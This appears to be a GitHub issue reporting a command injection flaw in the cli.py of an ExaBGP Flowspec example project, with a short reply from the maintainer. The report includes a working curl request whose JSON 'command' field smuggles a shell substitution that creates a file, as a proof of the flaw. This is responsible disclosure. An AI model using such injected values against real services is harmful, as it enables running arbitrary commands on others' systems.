search

BSpendlove / flowspec-v4-example

Flowspec v4 example with ExaBGP
0 stars 0 forks source link

cli.py: command injection vulnerability #1

Open networkhorse opened 3 years ago

networkhorse commented 3 years ago

Hi there,

Your cli.py is vulnerable to command injection as displayed below:

The original state:

/exabgp # ls
Dockerfile  cli.py  entrypoint.sh  exabgp.conf  requirements.txt

The injection:

curl -X POST -H 'Content-Type: application/json' --data "{\"neighbor\": \"blah\", \"command\": \"';"'$(touch /exabgp/test.txtbroken)'"'\"}" http://127.0.0.1:5001/exabgp/cli/announce/flowspec
{
  "error": false,
  "stdout": "b'command: neighbor blah\\n'"
}

And finally:

/exabgp # ls
Dockerfile  cli.py  entrypoint.sh  exabgp.conf  requirements.txt  test.txtbroken

Perhaps considering sanitising input.

Thanks!

BSpendlove commented 3 years ago

edit: I mean thank you for submitting an issue.

Please be aware that during these covid times, response times may be slow. Please allow 24-48 hours for any issues to be reviewed and/or resolved.